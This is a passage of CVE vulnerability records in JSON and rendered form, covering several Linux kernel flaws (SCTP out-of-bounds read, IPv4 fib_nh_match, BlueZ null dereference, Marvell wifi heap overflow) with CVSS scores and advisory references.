        "dateUpdated": "2023-01-30T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/pabeni/net-next.git/commit/?id=17a5f6a78dc7b8db385de346092d7d9f9dc24df6"
        },
        {
          "url": "https://vuldb.com/?id.211935"
        },
        {
          "name": "DSA-5333",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://www.debian.org/security/2023/dsa-5333"
        }
      ],
      "title": "Linux Kernel Ethernet mtk_ppe.c __mtk_ppe_check_skb use after free",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3636",
    "datePublished": "2022-10-21T00:00:00",
    "dateReserved": "2022-10-21T00:00:00",
    "dateUpdated": "2024-08-03T01:14:03.212Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2017-7558
Vulnerability from cvelistv5
Published
2018-07-26 15:00
Modified
2024-08-05 16:04
Severity
Summary
A kernel data leak due to an out-of-bound read was found in the Linux kernel in inet_diag_msg_sctp{,l}addr_fill() and sctp_get_sctp_info() functions present since version 4.7-rc1 through version 4.13. A data leak happens when these functions fill in sockaddr data structures used to export socket's diagnostic information. As a result, up to 100 bytes of the slab data could be leaked to a userspace.
References
URLTags
https://marc.info/?l=linux-netdev&m=150348777122761&w=2mailing-list, x_refsource_MLIST
https://access.redhat.com/errata/RHSA-2017:2918vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2017:2931vendor-advisory, x_refsource_REDHAT
http://www.securityfocus.com/bid/100466vdb-entry, x_refsource_BID
http://seclists.org/oss-sec/2017/q3/338mailing-list, x_refsource_MLIST
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-7558x_refsource_CONFIRM
http://www.securitytracker.com/id/1039221vdb-entry, x_refsource_SECTRACK
https://www.debian.org/security/2017/dsa-3981vendor-advisory, x_refsource_DEBIAN
https://access.redhat.com/errata/RHSA-2017:2930vendor-advisory, x_refsource_REDHAT
Impacted products
VendorProduct
Linuxkernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T16:04:12.011Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "[linux-netdev] 20170823 [PATCH net] sctp: Avoid out-of-bounds reads from address storage",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://marc.info/?l=linux-netdev\u0026m=150348777122761\u0026w=2"
          },
          {
            "name": "RHSA-2017:2918",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2017:2918"
          },
          {
            "name": "RHSA-2017:2931",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2017:2931"
          },
          {
            "name": "100466",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/100466"
          },
          {
            "name": "[oss-security] 20170823 CVE-2017-7558: Linux kernel: sctp: out-of-bounds read in inet_diag_msg_sctp{,l}addr_fill() and sctp_get_sctp_info()",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://seclists.org/oss-sec/2017/q3/338"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-7558"
          },
          {
            "name": "1039221",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1039221"
          },
          {
            "name": "DSA-3981",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2017/dsa-3981"
          },
          {
            "name": "RHSA-2017:2930",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2017:2930"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.7-rc1 through 4.13"
            }
          ]
        }
      ],
      "datePublic": "2017-08-23T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A kernel data leak due to an out-of-bound read was found in the Linux kernel in inet_diag_msg_sctp{,l}addr_fill() and sctp_get_sctp_info() functions present since version 4.7-rc1 through version 4.13. A data leak happens when these functions fill in sockaddr data structures used to export socket\u0027s diagnostic information. As a result, up to 100 bytes of the slab data could be leaked to a userspace."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 5.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-125",
              "description": "CWE-125",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-07-27T09:57:01",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "[linux-netdev] 20170823 [PATCH net] sctp: Avoid out-of-bounds reads from address storage",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://marc.info/?l=linux-netdev\u0026m=150348777122761\u0026w=2"
        },
        {
          "name": "RHSA-2017:2918",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2017:2918"
        },
        {
          "name": "RHSA-2017:2931",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2017:2931"
        },
        {
          "name": "100466",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/100466"
        },
        {
          "name": "[oss-security] 20170823 CVE-2017-7558: Linux kernel: sctp: out-of-bounds read in inet_diag_msg_sctp{,l}addr_fill() and sctp_get_sctp_info()",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://seclists.org/oss-sec/2017/q3/338"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-7558"
        },
        {
          "name": "1039221",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1039221"
        },
        {
          "name": "DSA-3981",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2017/dsa-3981"
        },
        {
          "name": "RHSA-2017:2930",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2017:2930"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2017-7558",
    "datePublished": "2018-07-26T15:00:00",
    "dateReserved": "2017-04-05T00:00:00",
    "dateUpdated": "2024-08-05T16:04:12.011Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3435
Vulnerability from cvelistv5
Published
2022-10-08 00:00
Modified
2024-08-03 01:07
Severity
Summary
Linux Kernel IPv4 fib_semantics.c fib_nh_match out-of-bounds
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:07:06.583Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lore.kernel.org/netdev/20221005181257.8897-1-dsahern%40kernel.org/T/#u"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.210357"
          },
          {
            "name": "FEDORA-2022-2cfbe17910",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/"
          },
          {
            "name": "FEDORA-2022-b948fc3cfb",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/"
          },
          {
            "name": "FEDORA-2022-1a5b125ac6",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/"
          },
          {
            "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability classified as problematic has been found in Linux Kernel. This affects the function fib_nh_match of the file net/ipv4/fib_semantics.c of the component IPv4 Handler. The manipulation leads to out-of-bounds read. It is possible to initiate the attack remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-210357 was assigned to this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-125 Out-of-Bounds Read",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-12-22T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://lore.kernel.org/netdev/20221005181257.8897-1-dsahern%40kernel.org/T/#u"
        },
        {
          "url": "https://vuldb.com/?id.210357"
        },
        {
          "name": "FEDORA-2022-2cfbe17910",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/"
        },
        {
          "name": "FEDORA-2022-b948fc3cfb",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/"
        },
        {
          "name": "FEDORA-2022-1a5b125ac6",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/"
        },
        {
          "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
        }
      ],
      "title": "Linux Kernel IPv4 fib_semantics.c fib_nh_match out-of-bounds",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3435",
    "datePublished": "2022-10-08T00:00:00",
    "dateReserved": "2022-10-08T00:00:00",
    "dateUpdated": "2024-08-03T01:07:06.583Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3563
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel BlueZ mgmt-tester.c read_50_controller_cap_complete null pointer dereference
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:01.568Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=e3c92f1f786f0b55440bd908b55894d0c792cf0e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211086"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability classified as problematic has been found in Linux Kernel. Affected is the function read_50_controller_cap_complete of the file tools/mgmt-tester.c of the component BlueZ. The manipulation of the argument cap_len leads to null pointer dereference. It is recommended to apply a patch to fix this issue. VDB-211086 is the identifier assigned to this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-404",
              "description": "CWE-404 Denial of Service -\u003e CWE-476 NULL Pointer Dereference",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-17T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=e3c92f1f786f0b55440bd908b55894d0c792cf0e"
        },
        {
          "url": "https://vuldb.com/?id.211086"
        }
      ],
      "title": "Linux Kernel BlueZ mgmt-tester.c read_50_controller_cap_complete null pointer dereference",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3563",
    "datePublished": "2022-10-17T00:00:00",
    "dateReserved": "2022-10-17T00:00:00",
    "dateUpdated": "2024-08-03T01:14:01.568Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2019-14816
Vulnerability from cvelistv5
Published
2019-09-20 18:25
Modified
2024-08-05 00:26
Severity
Summary
There is heap-based buffer overflow in kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code.
References
URLTags
http://www.openwall.com/lists/oss-security/2019/08/28/1mailing-list, x_refsource_MLIST
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4JZ6AEUKFWBHQAROGMQARJ274PQP2QP/vendor-advisory, x_refsource_FEDORA
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O3RUDQJXRJQVGHCGR4YZWTQ3ECBI7TXH/vendor-advisory, x_refsource_FEDORA
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14816x_refsource_CONFIRM
https://www.openwall.com/lists/oss-security/2019/08/28/1x_refsource_MISC
https://github.com/torvalds/linux/commit/7caac62ed598a196d6ddf8d9c121e12e082cac3x_refsource_MISC
https://access.redhat.com/security/cve/cve-2019-14816x_refsource_MISC
http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.htmlvendor-advisory, x_refsource_SUSE
http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.htmlvendor-advisory, x_refsource_SUSE
https://lists.debian.org/debian-lts-announce/2019/09/msg00025.htmlmailing-list, x_refsource_MLIST
https://usn.ubuntu.com/4157-1/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/4162-1/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/4157-2/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/4163-1/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/4163-2/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/4162-2/vendor-advisory, x_refsource_UBUNTU
http://packetstormsecurity.com/files/154951/Kernel-Live-Patch-Security-Notice-LSN-0058-1.htmlx_refsource_MISC
https://security.netapp.com/advisory/ntap-20191031-0005/x_refsource_CONFIRM
https://seclists.org/bugtraq/2019/Nov/11mailing-list, x_refsource_BUGTRAQ
http://packetstormsecurity.com/files/155212/Slackware-Security-Advisory-Slackware-14.2-kernel-Updates.htmlx_refsource_MISC
https://access.redhat.com/errata/RHSA-2020:0174vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2020:0204vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2020:0328vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2020:0339vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2020:0374vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2020:0375vendor-advisory, x_refsource_REDHAT
https://lists.debian.org/debian-lts-announce/2020/03/msg00001.htmlmailing-list, x_refsource_MLIST
https://access.redhat.com/errata/RHSA-2020:0653vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2020:0661vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2020:0664vendor-advisory, x_refsource_REDHAT
Impacted products
VendorProduct
Linuxkernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T00:26:39.113Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "[oss-security] 20190828 Linux kernel: three heap overflow in the marvell wifi driver",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2019/08/28/1"
          },
          {
            "name": "FEDORA-2019-4c91a2f76e",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4JZ6AEUKFWBHQAROGMQARJ274PQP2QP/"
          },
          {
            "name": "FEDORA-2019-97380355ae",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O3RUDQJXRJQVGHCGR4YZWTQ3ECBI7TXH/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14816"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.openwall.com/lists/oss-security/2019/08/28/1"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/torvalds/linux/commit/7caac62ed598a196d6ddf8d9c121e12e082cac3"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/security/cve/cve-2019-14816"
          },
          {
            "name": "openSUSE-SU-2019:2173",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.html"
          },
          {
            "name": "openSUSE-SU-2019:2181",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.html"
          },
          {
            "name": "[debian-lts-announce] 20190925 [SECURITY] [DLA 1930-1] linux security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
          },
          {
            "name": "USN-4157-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4157-1/"
          },
          {
            "name": "USN-4162-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4162-1/"
          },
          {
            "name": "USN-4157-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4157-2/"
          },
          {
            "name": "USN-4163-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4163-1/"
          },
          {
            "name": "USN-4163-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4163-2/"
          },
          {
            "name": "USN-4162-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4162-2/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/154951/Kernel-Live-Patch-Security-Notice-LSN-0058-1.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20191031-0005/"
          },
          {
            "name": "20191108 [slackware-security] Slackware 14.2 kernel (SSA:2019-311-01)",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "https://seclists.org/bugtraq/2019/Nov/11"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/155212/Slackware-Security-Advisory-Slackware-14.2-kernel-Updates.html"
          },
          {
            "name": "RHSA-2020:0174",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0174"
          },
          {
            "name": "RHSA-2020:0204",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0204"
          },
          {
            "name": "RHSA-2020:0328",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0328"
          },
          {
            "name": "RHSA-2020:0339",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0339"
          },
          {
            "name": "RHSA-2020:0374",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0374"
          },
          {
            "name": "RHSA-2020:0375",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0375"
          },
          {
            "name": "[debian-lts-announce] 20200302 [SECURITY] [DLA 2114-1] linux-4.9 security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
          },
          {
            "name": "RHSA-2020:0653",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0653"
          },
          {
            "name": "RHSA-2020:0661",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0661"
          },
          {
            "name": "RHSA-2020:0664",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0664"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "all versions up to, excluding 5.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "There is heap-based buffer overflow in kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-122",
              "description": "CWE-122",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-03-03T18:06:10",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "[oss-security] 20190828 Linux kernel: three heap overflow in the marvell wifi driver",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2019/08/28/1"
        },
        {
          "name": "FEDORA-2019-4c91a2f76e",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4JZ6AEUKFWBHQAROGMQARJ274PQP2QP/"
        },
        {
          "name": "FEDORA-2019-97380355ae",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O3RUDQJXRJQVGHCGR4YZWTQ3ECBI7TXH/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14816"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.openwall.com/lists/oss-security/2019/08/28/1"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/torvalds/linux/commit/7caac62ed598a196d6ddf8d9c121e12e082cac3"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://access.redhat.com/security/cve/cve-2019-14816"
        },
        {
          "name": "openSUSE-SU-2019:2173",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.html"
        },
        {
          "name": "openSUSE-SU-2019:2181",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.html"
        },
        {
          "name": "[debian-lts-announce] 20190925 [SECURITY] [DLA 1930-1] linux security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
        },
        {
          "name": "USN-4157-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4157-1/"
        },
        {
          "name": "USN-4162-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4162-1/"
        },
        {
          "name": "USN-4157-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4157-2/"
        },
        {
          "name": "USN-4163-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4163-1/"
        },
        {
          "name": "USN-4163-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4163-2/"
        },
        {
          "name": "USN-4162-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4162-2/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
